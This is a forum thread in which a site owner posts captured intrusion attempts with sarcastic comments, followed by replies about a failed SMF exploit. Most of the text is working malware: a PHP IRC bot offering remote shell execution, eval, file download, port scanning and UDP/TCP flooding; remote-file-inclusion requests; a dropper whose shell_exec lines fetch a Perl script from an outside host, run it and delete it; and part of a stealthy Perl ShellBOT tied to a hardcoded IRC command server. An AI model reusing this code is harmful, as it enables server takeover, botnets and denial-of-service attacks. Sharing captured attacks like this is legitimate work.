    echo "<td width="32%" $color>&nbsp;<a href="#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename]</a>&nbsp;<a href="{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=dir">[Del]</a>&nbsp;<a href="#{$file}" onclick="ChMod('$chdir', '$file')">[Chmod]</a>&nbsp;[Copy]</td>";
    }
    echo "</tr>";
    if ($colorn == 0) {
    $colorn = 1;
    }
    elseif ($colorn == 1) {
    $colorn = 0;
    }
    }
    }
    closedir($handle);
    }
    include 'http://members.lycos.co.uk/kalafi0r/up.txt?';
    ?>
    </table>
    </fieldset></form>
    <p align="center">

    // HEY GREAT!!! AT LEAST CRACKERS CARE ABOUT STANDARDS...

    &lt;a href="http://validator.w3.org/check?uri=referer"&gt;&lt;img
        src="http://www.w3.org/Icons/valid-html401"
        alt="Valid HTML 4.01 Transitional" height="31" width="88"&gt;&lt;/a&gt;
    

    </p>
    </body>

    </html>

    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    up.txt
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    <?

    // GOSH THIS LOOKS LIKE http://see-your-ip.info/phpbot.txt

    set_time_limit(0);
    error_reporting(0);

    class pBot
    {
    var $config = array("server"=>"tucows.westlin.com",
    "port"=>6667,
    "pass"=>"", //senha do server (sendpass to server)
    "prefix"=>"elo_bot",
    "maxrand"=>8,
    "chan"=>"#test",
    "key"=>"t3st", //senha do canal (sendpass to channel)
    "modes"=>"+p",
    "password"=>"root", //senha do bot (sendpass to bot)
    "trigger"=>".",
    "hostauth"=>"" // * for any hostname
    );
    var $users = array();
    function start()
    {
    if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
    $this->start();
    $ident = "";
    $alph = range("a","z");
    for($i=0;$i<$this->config['maxrand'];$i++)
    $ident .= $alph[rand(0,25)];
    if(strlen($this->config['pass'])>0)
    $this->send("PASS ".$this->config['pass']);
    $this->send("USER $ident 127.0.0.1 localhost :$ident");
    $this->set_nick();
    $this->main();
    }
    function main()
    {
    while(!feof($this->conn))
    {
    $this->buf = trim(fgets($this->conn,512));
    $cmd = explode(" ",$this->buf);
    if(substr($this->buf,0,6)=="PING :")
    {
    $this->send("PONG :".substr($this->buf,6));
    }
    if(isset($cmd[1]) && $cmd[1] =="001")
    {
    $this->send("MODE ".$this->nick." ".$this->config['modes']);
    $this->join($this->config['chan'],$this->config['key']);
    }
    if(isset($cmd[1]) && $cmd[1]=="433")
    {
    $this->set_nick();
    }
    if($this->buf != $old_buf)
    {
    $mcmd = array();
    $msg = substr(strstr($this->buf," :"),2);
    $msgcmd = explode(" ",$msg);
    $nick = explode("!",$cmd[0]);
    $vhost = explode("@",$nick[1]);
    $vhost = $vhost[1];
    $nick = substr($nick[0],1);
    $host = $cmd[0];
    if($msgcmd[0]==$this->nick)
    {
    for($i=0;$i<count($msgcmd);$i++)
    $mcmd[$i] = $msgcmd[$i+1];
    }
    else
    {
    for($i=0;$i<count($msgcmd);$i++)
    $mcmd[$i] = $msgcmd[$i];
    }
    if(count($cmd)>2)
    {
    switch($cmd[1])
    {
    case "QUIT":
    if($this->is_logged_in($host))
    {
    $this->log_out($host);
    }
    break;
    case "PART":
    if($this->is_logged_in($host))
    {
    $this->log_out($host);
    }
    break;
    case "PRIVMSG":
    if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "
    "))
    {
    if(substr($mcmd[0],0,1)==".")
    {
    switch(substr($mcmd[0],1))
    {
    case "user":
    if($mcmd[1]==$this->config['password'])
    {
    $this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged in");
    $this->log_in($host);
    }
    else
    {
    $this->privmsg($this->config['chan'],"[\2auth\2]: Incorrect password from $nick");
    }
    break;
    }
    }
    }
    elseif($this->is_logged_in($host))
    {
    if(substr($mcmd[0],0,1)==".")
    {
    switch(substr($mcmd[0],1))
    {

                            //RESTART
    
                            case "restart": 
                               $this-&gt;send("QUIT :restart"); 
                               fclose($this-&gt;conn); 
                               $this-&gt;start(); 
                            break; 
    
                            //MAIL
    
                            case "mail": //mail to from subject message 
                               if(count($mcmd)&gt;4) 
                               { 
                                  $header = "From: &lt;".$mcmd[2]."&gt;"; 
                                  if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) 
                                  { 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2mail\2]: Unable to send"); 
                                  } 
                                  else 
                                  { 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2"); 
                                  } 
                               } 
                            break;
    
                            //DNS
                             
                            case "dns": 
                               if(isset($mcmd[1])) 
                               { 
                                  $ip = explode(".",$mcmd[1]); 
                                  if(count($ip)==4 &amp;&amp; is_numeric($ip[0]) &amp;&amp; is_numeric($ip[1]) &amp;&amp; is_numeric($ip[2]) &amp;&amp; is_numeric($ip[3])) 
                                  { 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2dns\2]: ".$mcmd[1]." =&gt; ".gethostbyaddr($mcmd[1])); 
                                  } 
                                  else 
                                  { 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2dns\2]: ".$mcmd[1]." =&gt; ".gethostbyname($mcmd[1])); 
                                  } 
                               } 
                            break;
    
                            //INFO
    
                            case "info": 
                               $this-&gt;privmsg($this-&gt;config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]"); 
                            break;
    
                            //COMMAND
                              
                            case "cmd": 
                               if(isset($mcmd[1])) 
                               { 
                                  $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                                  $this-&gt;privmsg($this-&gt;config['chan'],"[\2cmd\2]: $command"); 
                                  $pipe = popen($command,"r"); 
                                  while(!feof($pipe)) 
                                  { 
                                     $pbuf = trim(fgets($pipe,512)); 
                                     if($pbuf != NULL) 
                                        $this-&gt;privmsg($this-&gt;config['chan'],"     : $pbuf"); 
                                  } 
                                  pclose($pipe); 
                               } 
                            break; 
    
                            // SET NICK BASED ON HTTPD SERVER TYPE
                              
                            case "rndnick": 
                               $this-&gt;set_nick(); 
                            break; 
    
                            //SEND A MSG,COMMAND
    
                            case "raw": 
                               $this-&gt;send(strstr($msg,$mcmd[1])); 
                            break; 
    
                            // UHHH, THIS DOES *SOMETHING*
    
                            case "php": 
                               $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); 
                            break; 
    
                            // EXECUTE A COMMAND FROM THE SHELL
    
                            case "exec": 
                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               $exec = shell_exec($command); 
                               $ret = explode("\n",$exec); 
                               $this-&gt;privmsg($this-&gt;config['chan'],"[\2exec\2]: $command"); 
                               for($i=0;$i&lt;count($ret);$i++) 
                                  if($ret[$i]!=NULL) 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"      : ".trim($ret[$i])); 
                            break; 
    
                            // PORTSCAN SOME SHIT
    
                            case "pscan": // .pscan 127.0.0.1 6667 
                               if(count($mcmd) &gt; 2) 
                               { 
                                  if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); 
                                  else 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); 
                               } 
                            break; 
    
                            // CHANGE IRC SERVERS
    
                            case "ud.server": // .udserver &lt;server&gt; &lt;port&gt; [password] 
                               if(count($mcmd)&gt;2) 
                               { 
                                  $this-&gt;config['server'] = $mcmd[1]; 
                                  $this-&gt;config['port'] = $mcmd[2]; 
                                  if(isset($mcmcd[3])) 
                                  { 
                                   $this-&gt;config['pass'] = $mcmd[3]; 
                                   $this-&gt;privmsg($this-&gt;config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]); 
                                  } 
                                  else 
                                  { 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]); 
                                  } 
                               } 
                            break; 
    
                            // DOWNLOAD STUFF
    
                            case "download": 
                               if(count($mcmd) &gt; 2) 
                               { 
                                  if(!$fp = fopen($mcmd[2],"w")) 
                                  { 
                                     $this-&gt;privmsg($this-&gt;config['chan'],"[\2download\2]: Cannot download, permission denied."); 
                                  } 
                                  else 
                                  { 
                                     if(!$get = file($mcmd[1])) 
                                     { 
                                        $this-&gt;privmsg($this-&gt;config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2"); 
                                     } 
                                     else 
                                     { 
                                        for($i=0;$i&lt;=count($get);$i++) 
                                        { 
                                           fwrite($fp,$get[$i]); 
                                        } 
                                        $this-&gt;privmsg($this-&gt;config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2"); 
                                     } 
                                     fclose($fp); 
                                  } 
                               } 
                            break; 
    
                            // QUIT
    
                            case "die": 
                               $this-&gt;send("QUIT :die command from $nick"); 
                               fclose($this-&gt;conn); 
                               exit; 
                            case "logout": 
                               $this-&gt;log_out($host); 
                               $this-&gt;privmsg($this-&gt;config['chan'],"[\2auth\2]: $nick logged out"); 
                            break; 
    
                            // FLOOD UDP
    
                            case "udpflood": 
                               if(count($mcmd)&gt;4) 
                               { 
                                  $this-&gt;udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); 
                               } 
                            break; 
    
                            // FLOOD TCP
    
                            case "tcpflood": 
                               if(count($mcmd)&gt;5) 
                               { 
                                  $this-&gt;tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); 
                               } 
                            break; 
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       } 
       $old_buf = $this-&gt;buf; 
    } 
    $this-&gt;start(); 
    

    }
    function send($msg)
    {
    fwrite($this->conn,"$msg\r\n");
    }
    function join($chan,$key=NULL)
    {
    $this->send("JOIN $chan $key");
    }
    function privmsg($to,$msg)
    {
    $this->send("PRIVMSG $to :$msg");
    }
    function is_logged_in($host)
    {
    if(isset($this->users[$host]))
    return 1;
    else
    return 0;
    }
    function log_in($host)
    {
    $this->users[$host] = true;
    }
    function log_out($host)
    {
    unset($this->users[$host]);
    }
    function set_nick()
    {
    if(isset($_SERVER['SERVER_SOFTWARE']))
    {
    if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
    $this->nick = "[A]";
    elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
    $this->nick = "[I]";
    elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
    $this->nick = "[X]";
    else
    $this->nick = "[U]";
    }
    else
    {
    $this->nick = "[C]";
    }
    $this->nick .= $this->config['prefix'];
    for($i=0;$i<$this->config['maxrand'];$i++)
    $this->nick .= mt_rand(0,9);
    $this->send("NICK ".$this->nick);
    }
    function udpflood($host,$packetsize,$time) {
    $this->privmsg($this->config['chan'],"[\2udpflood\2]: Floodando $host durante $time segundos com pacotes de $packetsize bytes");

        // TRANSL: FLOOD HOST DURATION $time SECONDS WITH PACKETS OF $packetsize BYTES (portuguses again)
    
    $packet = "";
    for($i=0;$i&lt;$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
    $timei = time();
    $i = 0;
    while(time()-$timei &lt; $time) {
    	$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
      	fwrite($fp,$packet);
       	fclose($fp);
    	$i++;
    }
    $env = $i * $packetsize;
    $env = $env / 1048576;
    $vel = $env / $time;
    $vel = round($vel);
    $env = round($env);
    $this-&gt;privmsg($this-&gt;config['chan'],"[\2udpflood\2]: Flood concluido: $env MB enviados / Velocidade media: $vel MB/s ");
    

    }
    function tcpflood($host,$packets,$packetsize,$port,$delay)
    {
    $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize");
    $packet = "";
    for($i=0;$i<$packetsize;$i++)
    $packet .= chr(mt_rand(1,256));
    for($i=0;$i<$packets;$i++)
    {
    if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
    {
    $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>");
    return 0;
    }
    else
    {
    fwrite($fp,$packet);
    fclose($fp);
    }
    sleep($delay);
    }
    $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Finished sending $packets packets to $host:$port.");
    }
    }

    // GO GO GADGET pBot!!!!

    $bot = new pBot;
    $bot->start();

    ?>

    NEW ATTACK, #2:
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Guest : 213.139.211.68 : July 14, 2007, 08:06:28 PM
    /forums/index.php?board=13;action=display;threadid=http%3A%2F%2Fwww.krippenverein.de%2Farchiv%2Fimages%2Finc%2F
    This topic doesn't exist on this board. - "http://www.krippenverein.de/archiv/images/inc/"
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    ANOTHER, #3:
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    71.29.236.111 - - [02/Jul/2007:18:14:06 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://dvl.by.ru/cmd/r57shell.txt? HTTP/1.1" 404 294

    ===== malcode:
    <?php
    //
    /

    /
    # # # #
    /
    # # # #
    /
    # # # #
    /
    # ## #### ## #
    /
    ## ## ###### ## ##
    /
    ## ## ###### ## ##
    /
    ## ## #### ## ##
    /
    ### ############ ###
    /
    ########################
    /
    ##############
    /
    ######## ########## #######
    /
    ### ## ########## ## ###
    /
    ### ## ########## ## ###
    /
    ### # ########## # ###
    /
    ### ## ######## ## ###
    /
    ## # ###### # ##
    /
    ## # #### # ##
    /
    ## ##
    /

    /

    /

    /
    r57shell.php - скрипт на пхп позволяющий вам выполнять системные команды на сервере через браузер
    /
    Вы можете скачать новую версию на нашем сайте: http://rst.void.ru
    /
    Версия: 1.3 (05.03.2006)
    /
    ~~~~~~~~~~
    /
    /
    Отдельная благодарность за помощь и идеи: blf, phoenix, virus, NorD и всем чертям из RST/GHC.
    /
    Если у Вас есть какие-либо идеи по поводу того какие функции следует добавить в скрипт то пишите
    /
    на rst@void.ru. Все предложения будут рассмотрены.
    /
    ~~~~~~~~~~
    /
    /
    (c)oded by 1dt.w0lf
    /
    RST/GHC http://rst.void.ru , http://ghc.ru
    /
    ANY MODIFIED REPUBLISHING IS RESTRICTED
    /
    **********************************/
    /
    ~~~ Настройки | Options ~~~ */

    include("http://dvl.by.ru/box.txt");

    ///INCLUDE FILE CONTAINS:
    /* <?
    echo('vulnerable');
    shell_exec('cd /tmp;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;curl -O crewcorp.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;fetch http://dvl.by.ru/crewcorp.txt;crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /tmp;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;curl -O box.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;fetch http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    shell_exec('cd /dev/shm;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
    ?> */

    ////MORE- "crewcorp.txt" CONTAINS:

    /*#!/usr/bin/perl

    ShellBOT by: devil__

    Greetz: Puna, Kelserific

    Comandos:

    @oldpack <ip> <bytes> <tempo>;

    @udp <ip> <porta> <tempo>;

    @fullportscan <ip> <porta inicial> <porta final>;

    @conback <ip> <porta>

    @download <url> <arquivo a ser salvo>;

    !estatisticas <on/off>;

    !sair para finalizar o bot;

    !novonick para trocar o nick do bot por um novo aleatorio;

    !entra <canal> <tempo>

    !sai <canal> <tempo>;

    !pacotes <on/off>

    @info

    # @xpl <kernel>
    # @sendmail <assunto> <remetente> <destinatario> <conteudo>

    ########## CONFIGURACAO ############

    my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
    my $processo = $ps[rand scalar @ps];

    $servidor='priv8.crewcorp.net' unless $servidor;
    my $porta='3121';
    my @canais=("#crew");
    my @adms=("devil__","kelserific","ITAL0","Puna","wicked");

    Anti Flood ( 6/3 Recomendado )

    my $linas_max=10;
    my $sleep=3;

    my $nick = getnick();
    my $ircname = getident2();
    my $realname = "windows nt 5.1 build 2600";
    #chop (my $realname = uname -n);

    my $acessoshell = 1;
    ######## Stealth ShellBot ##########
    my $prefixo = "!all";
    my $estatisticas = 0;
    my $pacotes = 1;
    ####################################

    my $VERSAO = '0.3b';

    $SIG{'INT'} = 'IGNORE';
    $SIG{'HUP'} = 'IGNORE';
    $SIG{'TERM'} = 'IGNORE';
    $SIG{'CHLD'} = 'IGNORE';
    $SIG{'PS'} = 'IGNORE';

    use IO::Socket;
    use Socket;
    use IO::Select;
    chdir("/");
    $servidor="$ARGV[0]" if $ARGV[0];
    $0="$processo"."\0";
    my $pid=fork;
    exit if $pid;
    die "Problema com o fork: $!" unless defined($pid);

    my %irc_servers;
    my %DCC;
    my $dcc_sel = new IO::Select->new();

    #####################

    Stealth Shellbot

    #####################

    sub getnick {
    return "crew^".int(rand(1000));
    }

    sub getident2 {
    my $length=shift;
    $length = 3 if ($length < 3);

        my @chars=('a'..'z','A'..'Z','1'..'9');
        foreach (1..$length)
        {
                $randomstring.=$chars[rand @chars];
        }
        return $randomstring;
    

    }

    #############################

    B0tchZ na veia ehehe :P

    #############################

    $sel_cliente = IO::Select->new();
    sub sendraw {
    if ($#_ == '1') {
    my $socket = $[0];
    print $socket "$
    [1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
    }
    }

    sub conectar {
    my $meunick = $[0];
    my $servidor_con = $
    [1];
    my $porta_con = $_[2];

    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

     $IRC_socket-&gt;autoflush(1);
     $sel_cliente-&gt;add($IRC_socket);
    
     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"</PRE>


  • found this on the web

     Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
    

    /forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???


    Looks like he's trying a SMF exploit (he's doing it wrong, though), as Sources/Packages.php is a SMF file. Note that this will never work, accessing a SMF file like Sources/Packages.php directly won't work (it will just show a "hacking attempt..." message), and $sourcedir is always defined in Settings.php (which is always require()d)



  • I know no pages should do that but maybe it was someone who was just trying to test the security of your web-site, I get wrong requests on my web-site sometimes as well and as lonog as it doesn't breach my security it is OK now you can see whether or not it is really secure, and if it isn't secure, fix it. I sometimes get weirder requests than this on my web-site. (Of course, if I would test the security in this way, which I don't do unless I see something that looks like it could easily be exploited, I would instead add a message somewhere that says it is insecure and if the owner of this site can please correct it soon? If it is insecure I would notify the owner! Usually it is secure though, and that is good)


Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.